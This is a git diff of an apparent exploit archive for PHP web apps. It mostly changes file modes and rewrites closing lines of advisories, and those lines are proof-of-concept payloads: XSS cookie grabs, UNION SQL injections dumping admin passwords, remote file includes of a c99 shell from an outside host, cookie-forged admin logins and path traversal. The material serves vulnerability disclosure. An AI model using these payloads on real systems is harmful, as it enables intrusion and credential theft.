a/platforms/php/webapps/32085.txt b/platforms/php/webapps/32085.txt old mode 100755 new mode 100644 index 94d56efed..9fff37a51 --- a/platforms/php/webapps/32085.txt +++ b/platforms/php/webapps/32085.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow phpFreeChat 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/path/demo/demo21_with_hardcoded_urls.php/>'><ScRiPt>alert(document.cookie)</ScRiPt> \ No newline at end of file +http://www.example.com/path/demo/demo21_with_hardcoded_urls.php/>'><ScRiPt>alert(document.cookie)</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/32087.txt b/platforms/php/webapps/32087.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32088.pl b/platforms/php/webapps/32088.pl index 11ab176f9..cc3505471 100755 --- a/platforms/php/webapps/32088.pl +++ b/platforms/php/webapps/32088.pl @@ -207,4 +207,4 @@ $mod=<stdin>; if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; }; if ($mod=="1") { xpl1(); }; -if ($mod=="2") { xpl2(); }; \ No newline at end of file +if ($mod=="2") { xpl2(); }; \ No newline at end of file diff --git a/platforms/php/webapps/3209.txt b/platforms/php/webapps/3209.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32090.txt b/platforms/php/webapps/32090.txt old mode 100755 new mode 100644 index 94ac5a9d7..d6c5fa0e8 --- a/platforms/php/webapps/32090.txt +++ b/platforms/php/webapps/32090.txt @@ -4,4 +4,4 @@ Maran PHP Blog is prone to a cross-site scripting vulnerability because it fails An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/comments.php?id=%3E%3C%3E%27%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/comments.php?id=%3E%3C%3E%27%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/32091.txt b/platforms/php/webapps/32091.txt old mode 100755 new mode 100644 index b968b4f96..0056dfe5e --- a/platforms/php/webapps/32091.txt +++ b/platforms/php/webapps/32091.txt @@ -9,4 +9,4 @@ MyBlog 0.9.8 is vulnerable; other versions may also be affected. http://www.example.com/config/mysqlconnection.inc http://www.example.com/config/mysqlconnection%20-%20Copy.inc http://www.example.com/admin/setup.php -http://www.example.com/config/settings.inc \ No newline at end of file +http://www.example.com/config/settings.inc \ No newline at end of file diff --git a/platforms/php/webapps/32092.txt b/platforms/php/webapps/32092.txt old mode 100755 new mode 100644 index 05f154b1a..26a14c087 --- a/platforms/php/webapps/32092.txt +++ b/platforms/php/webapps/32092.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute malicious PHP code in the context Flip 3.0 is vulnerable; other versions may also be affected. -http://www.example.com/config.php?incpath=[SHELL] \ No newline at end of file +http://www.example.com/config.php?incpath=[SHELL] \ No newline at end of file diff --git a/platforms/php/webapps/32093.txt b/platforms/php/webapps/32093.txt old mode 100755 new mode 100644 index 04acda8a9..af3e9b47e --- a/platforms/php/webapps/32093.txt +++ b/platforms/php/webapps/32093.txt @@ -5,4 +5,4 @@ phpKF is prone to an SQL-injection vulnerability because it fails to sufficientl Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/lab/phpkf/yonetim/forum_duzen.php?kip=forum_duzenle&fno='+union+select+kullanici_adi,concat(database(),0x3a,version()),sifre+from+phpkf_kullanicilar/* \ No newline at end of file +http://www.example.com/lab/phpkf/yonetim/forum_duzen.php?kip=forum_duzenle&fno='+union+select+kullanici_adi,concat(database(),0x3a,version()),sifre+from+phpkf_kullanicilar/* \ No newline at end of file diff --git a/platforms/php/webapps/32097.txt b/platforms/php/webapps/32097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32098.txt b/platforms/php/webapps/32098.txt old mode 100755 new mode 100644 index a1f656d2f..6e50f2abb --- a/platforms/php/webapps/32098.txt +++ b/platforms/php/webapps/32098.txt @@ -8,4 +8,4 @@ The attacker may leverage the cross-site scripting issue to execute arbitrary sc XOOPS 2.0.18.1 is vulnerable; other versions may also be affected. -http://www.example.com/scripts_path/modules/system/admin.php?fct="><script>alert("xss")</script> \ No newline at end of file +http://www.example.com/scripts_path/modules/system/admin.php?fct="><script>alert("xss")</script> \ No newline at end of file diff --git a/platforms/php/webapps/32099.txt b/platforms/php/webapps/32099.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32100.txt b/platforms/php/webapps/32100.txt old mode 100755 new mode 100644 index b323e16d9..0ac6cc00f --- a/platforms/php/webapps/32100.txt +++ b/platforms/php/webapps/32100.txt @@ -6,4 +6,4 @@ Exploiting these issues can allow an attacker to compromise the application and RunCMS 1.6.1 is vulnerable; other versions may be affected as well. -http://www.example.com/modules/newbb_plus/config.php?bbPath[root_theme]=http://www.example2.com \ No newline at end of file +http://www.example.com/modules/newbb_plus/config.php?bbPath[root_theme]=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/32101.txt b/platforms/php/webapps/32101.txt old mode 100755 new mode 100644 index 2ed68ade7..79ea298f3 --- a/platforms/php/webapps/32101.txt +++ b/platforms/php/webapps/32101.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to gain administrative access to the eSyndiCat 1.6 is vulnerable; other versions may also be affected. -javascript:document.cookie = "admin_lng=1; path=/"; \ No newline at end of file +javascript:document.cookie = "admin_lng=1; path=/"; \ No newline at end of file diff --git a/platforms/php/webapps/32102.txt b/platforms/php/webapps/32102.txt old mode 100755 new mode 100644 index 4f505fa98..8a6723db8 --- a/platforms/php/webapps/32102.txt +++ b/platforms/php/webapps/32102.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to gain administrative access to the AlphAdmin CMS 1.0.5_03 is vulnerable; other versions may also be affected. -javascript:document.cookie = "aa_login=1; path=/"; \ No newline at end of file +javascript:document.cookie = "aa_login=1; path=/"; \ No newline at end of file diff --git a/platforms/php/webapps/32106.txt b/platforms/php/webapps/32106.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32107.txt b/platforms/php/webapps/32107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32108.txt b/platforms/php/webapps/32108.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32109.txt b/platforms/php/webapps/32109.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32113.txt b/platforms/php/webapps/32113.txt old mode 100755 new mode 100644 index f9aaf85df..1c4790617 --- a/platforms/php/webapps/32113.txt +++ b/platforms/php/webapps/32113.txt @@ -7,4 +7,4 @@ A successful exploit may allow an attacker to compromise the application, access CUA 4.0_4735.p4 is vulnerable; other versions may also be affected. Username: valid_user_name -Password: -- \ No newline at end of file +Password: -- \ No newline at end of file diff --git a/platforms/php/webapps/32114.txt b/platforms/php/webapps/32114.txt old mode 100755 new mode 100644 index 7ceb2e36e..a84867b15 --- a/platforms/php/webapps/32114.txt +++ b/platforms/php/webapps/32114.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc AtomPhotoBlog 1.15b1 is vulnerable; other versions may also be affected. -http://www.example.com/atomPhotoBlog.php?do=show&photoId=969696+union+select+0,0,0,0,0,0,0,0,0,0,0,mail,pass,0+from+user \ No newline at end of file +http://www.example.com/atomPhotoBlog.php?do=show&photoId=969696+union+select+0,0,0,0,0,0,0,0,0,0,0,mail,pass,0+from+user \ No newline at end of file diff --git a/platforms/php/webapps/32115.txt b/platforms/php/webapps/32115.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32116.txt b/platforms/php/webapps/32116.txt old mode 100755 new mode 100644 index 95688f35d..fd22bbe9e --- a/platforms/php/webapps/32116.txt +++ b/platforms/php/webapps/32116.txt @@ -4,4 +4,4 @@ ezContents CMS is prone to a remote file-include vulnerability because it fails An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=http://www.example2.com/soqor10/c99.txt? \ No newline at end of file +http://www.example.com/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=http://www.example2.com/soqor10/c99.txt? \ No newline at end of file diff --git a/platforms/php/webapps/32117.txt b/platforms/php/webapps/32117.txt old mode 100755 new mode 100644 index 06e9c967c..71cb9800c --- a/platforms/php/webapps/32117.txt +++ b/platforms/php/webapps/32117.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Versions up to and including TriO 2.1 are vulnerable. http://site.com/browse.php?id=-1+UNION+SELECT+EMAIL+from+Webusers-- -http://site.com/browse.php?id=-1+UNION+SELECT+SUPERSECRETPASSWORD+from+Webusers-- \ No newline at end of file +http://site.com/browse.php?id=-1+UNION+SELECT+SUPERSECRETPASSWORD+from+Webusers-- \ No newline at end of file diff --git a/platforms/php/webapps/32118.txt b/platforms/php/webapps/32118.txt old mode 100755 new mode 100644 index 308be1aa3..477073672 --- a/platforms/php/webapps/32118.txt +++ b/platforms/php/webapps/32118.txt @@ -4,4 +4,4 @@ GC Auction Platinum is prone to an SQL-injection vulnerability because it fails Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password),3+from+admin-- \ No newline at end of file +http://www.example.com/category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password),3+from+admin-- \ No newline at end of file diff --git a/platforms/php/webapps/3212.txt b/platforms/php/webapps/3212.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32121.php b/platforms/php/webapps/32121.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32122.txt b/platforms/php/webapps/32122.txt old mode 100755 new mode 100644 index a2ca3289d..77edeb62d --- a/platforms/php/webapps/32122.txt +++ b/platforms/php/webapps/32122.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Owl Intranet Engine 0.95 is vulnerable; prior versions may also be affected. -http://www.example.com/Owl/register.php?myaction=getpasswd&username="><script>alert(1);</script> \ No newline at end of file +http://www.example.com/Owl/register.php?myaction=getpasswd&username="><script>alert(1);</script> \ No newline at end of file diff --git a/platforms/php/webapps/32123.txt b/platforms/php/webapps/32123.txt old mode 100755 new mode 100644 index 6d4d07842..0175c26af --- a/platforms/php/webapps/32123.txt +++ b/platforms/php/webapps/32123.txt @@ -5,4 +5,4 @@ The RSS plugin for miniBB is prone to multiple remote file-include vulnerabiliti Exploiting these issues can allow an attacker to compromise the application and the underlying computer; other attacks are also possible. http://www.example.com/rss2.php?premodDir=[EVIL] -http://www.example.com/rss2.php?pathToFiles=[EVIL] \ No newline at end of file +http://www.example.com/rss2.php?pathToFiles=[EVIL] \ No newline at end of file diff --git a/platforms/php/webapps/32126.txt b/platforms/php/webapps/32126.txt old mode 100755 new mode 100644 index ddbde71e5..7aae0af10 --- a/platforms/php/webapps/32126.txt +++ b/platforms/php/webapps/32126.txt @@ -8,4 +8,4 @@ Attacker-supplied HTML and script code would run in the context of the affected The issue affects ScrewTurn Wiki 2.0.29 and 2.0.30; other versions may also be affected. The following example URI is available: -http://www.example.com/?[script]alert('XSS')[/script] \ No newline at end of file +http://www.example.com/?[script]alert('XSS')[/script] \ No newline at end of file diff --git a/platforms/php/webapps/32128.txt b/platforms/php/webapps/32128.txt old mode 100755 new mode 100644 index 448255a3b..ddb92ad39 --- a/platforms/php/webapps/32128.txt +++ b/platforms/php/webapps/32128.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow MJGUEST 6.8 GT is vulnerable; other versions may also be affected. -http://www.example.com/guestbook.js.php?link=[XSS] \ No newline at end of file +http://www.example.com/guestbook.js.php?link=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32130.txt b/platforms/php/webapps/32130.txt old mode 100755 new mode 100644 index 3e6b5f13a..945abe393 --- a/platforms/php/webapps/32130.txt +++ b/platforms/php/webapps/32130.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to view sensitive information, s DEV Web Management System 1.5 is vulnerable; other versions may also be affected. -http://www.example.com/?session=">><>><script>alert(document.cookie)</script> <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://www.example.com/index.php?session=0&action=search" method="POST" name="form"> <form method="post" onSubmit="return validateprm(this)"><input type="hidden" name="prip" value="true"/><input type="hidden" name="action" value="search"/> <input type="hidden" name="kluc" value="&#34&#39&#39&#39&#60&#62&#62&#62&#62<script>alert('xss')</script>"> </form> </body> </html> http://www.example.com/index.php?session=0&action=read&click=open&article=[SQL CODE] http://www.example.com/admin/index.php?start=install&step=file.type%00 \ No newline at end of file +http://www.example.com/?session=">><>><script>alert(document.cookie)</script> <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://www.example.com/index.php?session=0&action=search" method="POST" name="form"> <form method="post" onSubmit="return validateprm(this)"><input type="hidden" name="prip" value="true"/><input type="hidden" name="action" value="search"/> <input type="hidden" name="kluc" value="&#34&#39&#39&#39&#60&#62&#62&#62&#62<script>alert('xss')</script>"> </form> </body> </html> http://www.example.com/index.php?session=0&action=read&click=open&article=[SQL CODE] http://www.example.com/admin/index.php?start=install&step=file.type%00 \ No newline at end of file diff --git a/platforms/php/webapps/32131.txt b/platforms/php/webapps/32131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32134.txt b/platforms/php/webapps/32134.txt old mode 100755 new mode 100644 index 05a117749..3c87f3d1c --- a/platforms/php/webapps/32134.txt +++ b/platforms/php/webapps/32134.txt @@ -4,4 +4,4 @@ H0tturk Panel is prone to a remote file-include vulnerability because it fails t An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/hot/gizli.php?cfgProgDir=cmd.txt? \ No newline at end of file +http://www.example.com/hot/gizli.php?cfgProgDir=cmd.txt? \ No newline at end of file diff --git a/platforms/php/webapps/32135.txt b/platforms/php/webapps/32135.txt old mode 100755 new mode 100644 index 679e009f7..d6430664a --- a/platforms/php/webapps/32135.txt +++ b/platforms/php/webapps/32135.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects csphonebook 1.02; other versions may also be affected. -http://www.example.com/index.php?letter=[XSS] \ No newline at end of file +http://www.example.com/index.php?letter=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32139.txt b/platforms/php/webapps/32139.txt old mode 100755 new mode 100644 index 74d7a04ad..7902152ef --- a/platforms/php/webapps/32139.txt +++ b/platforms/php/webapps/32139.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow freeForum 1.7 is vulnerable; other versions may also be affected. -http://www.example.com/path/?acuparam=>"><ScRiPt>alert(111)</ScRiPt> http://www.example.com/path/index.php/>'><ScRiPt>alert(111)</ScRiPt> http://www.example.com/path/index.php?acuparam=>"><ScRiPt>alert(111)</ScRiPt> \ No newline at end of file +http://www.example.com/path/?acuparam=>"><ScRiPt>alert(111)</ScRiPt> http://www.example.com/path/index.php/>'><ScRiPt>alert(111)</ScRiPt> http://www.example.com/path/index.php?acuparam=>"><ScRiPt>alert(111)</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/32140.txt b/platforms/php/webapps/32140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32141.txt b/platforms/php/webapps/32141.txt old mode 100755 new mode 100644 index 59de37827..a46d1979d --- a/platforms/php/webapps/32141.txt +++ b/platforms/php/webapps/32141.txt @@ -4,4 +4,4 @@ Homes 4 Sale is prone to a cross-site scripting vulnerability because it fails t An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/result.php?r=c%253E%255BHWtZYeidnW%257BdH%253A1MnOwcR%253E%253E%2527tfbsdi%2560uzqf%253Etfbsdi%2527f%253Ebtl%253CTB%253C67%253C2% 253C2%253C498984%253Ctuzmf2%256067%252Fdtt%253C3%253Cjoufsdptnpt%2560bggjmjbuf%25602%2560e3s%2560efsq%253Cksfct31%253Cksfct31%253C93454%253C43642%253Cbtl %253C%253C0e0tfbsdi0q0joufsdptnpt0ynm0epnbjomboefs0joum0e3s0gfg0qpqdbu0w30%253Cqbslfe%252Ftzoejdbujpo%252Fbtl%252Fdpn%2527jqvb%2560je%253E%253A%253A597&K eywords= \ No newline at end of file +http://www.example.com/result.php?r=c%253E%255BHWtZYeidnW%257BdH%253A1MnOwcR%253E%253E%2527tfbsdi%2560uzqf%253Etfbsdi%2527f%253Ebtl%253CTB%253C67%253C2% 253C2%253C498984%253Ctuzmf2%256067%252Fdtt%253C3%253Cjoufsdptnpt%2560bggjmjbuf%25602%2560e3s%2560efsq%253Cksfct31%253Cksfct31%253C93454%253C43642%253Cbtl %253C%253C0e0tfbsdi0q0joufsdptnpt0ynm0epnbjomboefs0joum0e3s0gfg0qpqdbu0w30%253Cqbslfe%252Ftzoejdbujpo%252Fbtl%252Fdpn%2527jqvb%2560je%253E%253A%253A597&K eywords= \ No newline at end of file diff --git a/platforms/php/webapps/32142.php b/platforms/php/webapps/32142.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32143.txt b/platforms/php/webapps/32143.txt old mode 100755 new mode 100644 index 9f791cd52..42adea8cf --- a/platforms/php/webapps/32143.txt +++ b/platforms/php/webapps/32143.txt @@ -10,4 +10,4 @@ The following proofs of concept are available: A. admin' OR 1=1/* B. fdfds' OR 1=1 limit x/* -C.' AND 1=2 union select 1,2/* \ No newline at end of file +C.' AND 1=2 union select 1,2/* \ No newline at end of file diff --git a/platforms/php/webapps/32144.txt b/platforms/php/webapps/32144.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32145.txt b/platforms/php/webapps/32145.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32146.txt b/platforms/php/webapps/32146.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32147.txt b/platforms/php/webapps/32147.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32148.txt b/platforms/php/webapps/32148.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32149.txt b/platforms/php/webapps/32149.txt old mode 100755 new mode 100644 index 11b3133de..dc68182a4 --- a/platforms/php/webapps/32149.txt +++ b/platforms/php/webapps/32149.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br MRBS 1.2.6 is vulnerable; other versions may also be affected. -http://www.example.com/path/help.php?area=[XSS] \ No newline at end of file +http://www.example.com/path/help.php?area=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32150.txt b/platforms/php/webapps/32150.txt old mode 100755 new mode 100644 index 0f84a2237..70b216c80 --- a/platforms/php/webapps/32150.txt +++ b/platforms/php/webapps/32150.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability using directory-traversal strings to UNAK-CMS 1.5.5 is vulnerable; other versions may also be affected. -http://www.example.com/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=/file.type%00 \ No newline at end of file +http://www.example.com/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=/file.type%00 \ No newline at end of file diff --git a/platforms/php/webapps/3216.txt b/platforms/php/webapps/3216.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32168.txt b/platforms/php/webapps/32168.txt old mode 100755 new mode 100644 index 0c6282c3e..1c21fceb4 --- a/platforms/php/webapps/32168.txt +++ b/platforms/php/webapps/32168.txt @@ -19,4 +19,4 @@ http://www.example.com/data/inc/header.php?lang_kop5=[Cross Site Scripting] http://www.example.com/data/inc/header.php?titelkop=[Cross Site Scripting] http://www.example.com/data/inc/header2.php?pluck_version=[Cross Site Scripting] http://www.example.com/data/inc/header2.php?titelkop=[Cross Site Scripting] -http://www.example.com/data/inc/themeinstall.php?lang_theme6=[Cross Site Scripting] \ No newline at end of file +http://www.example.com/data/inc/themeinstall.php?lang_theme6=[Cross Site Scripting] \ No newline at end of file diff --git a/platforms/php/webapps/32169.txt b/platforms/php/webapps/32169.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3217.txt b/platforms/php/webapps/3217.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32170.txt b/platforms/php/webapps/32170.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32171.txt b/platforms/php/webapps/32171.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32172.txt b/platforms/php/webapps/32172.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32173.txt b/platforms/php/webapps/32173.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32174.txt b/platforms/php/webapps/32174.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32175.txt b/platforms/php/webapps/32175.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32176.txt b/platforms/php/webapps/32176.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32177.txt b/platforms/php/webapps/32177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32178.txt b/platforms/php/webapps/32178.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32179.txt b/platforms/php/webapps/32179.txt old mode 100755 new mode 100644 index 3dda5e1c2..eab2c1048 --- a/platforms/php/webapps/32179.txt +++ b/platforms/php/webapps/32179.txt @@ -4,4 +4,4 @@ POWERGAP Shopsystem is prone to an SQL-injection vulnerability because it fails Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/s03.php?shopid=s03&cur=eur&sp=de&ag='[SQL] \ No newline at end of file +http://www.example.com/s03.php?shopid=s03&cur=eur&sp=de&ag='[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/32180.txt b/platforms/php/webapps/32180.txt old mode 100755 new mode 100644 index a540b23dd..5717c8f7a --- a/platforms/php/webapps/32180.txt +++ b/platforms/php/webapps/32180.txt @@ -7,4 +7,4 @@ An attacker can exploit these issues using directory-traversal strings to view l Contact 0.1.0 is vulnerable; other versions may also be affected. http://www.example.com/path/index.php?module=[LFI] -http://www.example.com/path/admin/index.php?module=[LFI] \ No newline at end of file +http://www.example.com/path/admin/index.php?module=[LFI] \ No newline at end of file diff --git a/platforms/php/webapps/32181.txt b/platforms/php/webapps/32181.txt old mode 100755 new mode 100644 index 0f7d75035..bd999a57b --- a/platforms/php/webapps/32181.txt +++ b/platforms/php/webapps/32181.txt @@ -8,4 +8,4 @@ Battle.net Clan Script 1.5.2 is vulnerable; other versions may also be affected. http://www.example.com/index.php?page=members&showmember='+union+select+name,1,2,password+from+bcs_members/* -http://www.example.com/index.php?page=board&thread=-9999+union+select+0,1,password,name,4,5,6,7+from+bcs_members/* \ No newline at end of file +http://www.example.com/index.php?page=board&thread=-9999+union+select+0,1,password,name,4,5,6,7+from+bcs_members/* \ No newline at end of file diff --git a/platforms/php/webapps/32182.txt b/platforms/php/webapps/32182.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32183.txt b/platforms/php/webapps/32183.txt old mode 100755 new mode 100644 index 05a50c50b..4e47d83a7 --- a/platforms/php/webapps/32183.txt +++ b/platforms/php/webapps/32183.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability using directory-traversal strings to phpKF-Portal 1.10 is vulnerable; other versions may also be affected. -http://www.example.com/path/anket_yonetim.php?portal_ayarlarportal_dili=../%00LocalFile] \ No newline at end of file +http://www.example.com/path/anket_yonetim.php?portal_ayarlarportal_dili=../%00LocalFile] \ No newline at end of file diff --git a/platforms/php/webapps/32186.txt b/platforms/php/webapps/32186.txt old mode 100755 new mode 100644 index 4bdd940fc..288ef3561 --- a/platforms/php/webapps/32186.txt +++ b/platforms/php/webapps/32186.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Quate CMS 0.3.4 is vulnerable; other versions may also be affected. http://www.example.com/path/admin/includes/themes/default/header.php?page_area=[XSS] -http://www.example.com/path/admin/includes/themes/default/header.php?page_header=[XSS] \ No newline at end of file +http://www.example.com/path/admin/includes/themes/default/header.php?page_header=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32187.txt b/platforms/php/webapps/32187.txt old mode 100755 new mode 100644 index 3a47c0016..5abf4b651 --- a/platforms/php/webapps/32187.txt +++ b/platforms/php/webapps/32187.txt @@ -7,4 +7,4 @@ Exploiting these issues can allow an attacker to compromise the application and These issues affect com_utchat 0.9.2; other versions may also be affected. http://www.example.com/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=[Sh3LL] -http://www.example.com/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/SetupDecorator.php?aFile=[Sh3LL] \ No newline at end of file +http://www.example.com/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/SetupDecorator.php?aFile=[Sh3LL] \ No newline at end of file diff --git a/platforms/php/webapps/32188.txt b/platforms/php/webapps/32188.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32190.txt b/platforms/php/webapps/32190.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32191.txt b/platforms/php/webapps/32191.txt old mode 100755 new mode 100644 index 99854ba06..e6ed39de4 --- a/platforms/php/webapps/32191.txt +++ b/platforms/php/webapps/32191.txt @@ -5,4 +5,4 @@ The Kleinanzeigen module for PHP-Nuke is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/modules.php?name=Kleinanzeigen&a_op=visit&lid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A -http://www.example.com/modules.php?name=Kleinanzeigen&a_op=visit&lid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A \ No newline at end of file +http://www.example.com/modules.php?name=Kleinanzeigen&a_op=visit&lid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A \ No newline at end of file diff --git a/platforms/php/webapps/32196.txt b/platforms/php/webapps/32196.txt old mode 100755 new mode 100644 index c2fd95eae..98b7fcf73 --- a/platforms/php/webapps/32196.txt +++ b/platforms/php/webapps/32196.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br MiniShop 1.0 is affected; other versions may also be vulnerable. -http://www.example.com/[cms]/modules/rmms/search.php?itemsxpag=4"><script>alert(1)</script>&Submit=Go%21&idc=0"><script>alert(2)</script>&key="><script>alert(3)</script> \ No newline at end of file +http://www.example.com/[cms]/modules/rmms/search.php?itemsxpag=4"><script>alert(1)</script>&Submit=Go%21&idc=0"><script>alert(2)</script>&key="><script>alert(3)</script> \ No newline at end of file diff --git a/platforms/php/webapps/32198.txt b/platforms/php/webapps/32198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32199.txt b/platforms/php/webapps/32199.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32200.txt b/platforms/php/webapps/32200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32201.txt b/platforms/php/webapps/32201.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32202.txt b/platforms/php/webapps/32202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32203.txt b/platforms/php/webapps/32203.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32207.txt b/platforms/php/webapps/32207.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3221.php b/platforms/php/webapps/3221.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32211.txt b/platforms/php/webapps/32211.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32213.txt b/platforms/php/webapps/32213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32215.txt b/platforms/php/webapps/32215.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32216.txt b/platforms/php/webapps/32216.txt old mode 100755 new mode 100644 index cf1abde29..e47c8994a --- a/platforms/php/webapps/32216.txt +++ b/platforms/php/webapps/32216.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Downloads Plus 1.5 and 1.7 are affected; other versions may also be vulnerable. http://www.example.com/modules/rmdp/down.php?id=1">[XSS-code] -http://www.example.com/modules/rmdp/down.php?com_mode=nest&com_order=1&id=1">[XSS-code]&cid=3#users \ No newline at end of file +http://www.example.com/modules/rmdp/down.php?com_mode=nest&com_order=1&id=1">[XSS-code]&cid=3#users \ No newline at end of file diff --git a/platforms/php/webapps/32217.txt b/platforms/php/webapps/32217.txt old mode 100755 new mode 100644 index cddddb68d..b3b48af67 --- a/platforms/php/webapps/32217.txt +++ b/platforms/php/webapps/32217.txt @@ -7,4 +7,4 @@ Exploiting these issues can allow an attacker to compromise the application and Linkspider 1.08 is vulnerable; other versions may be affected as well. 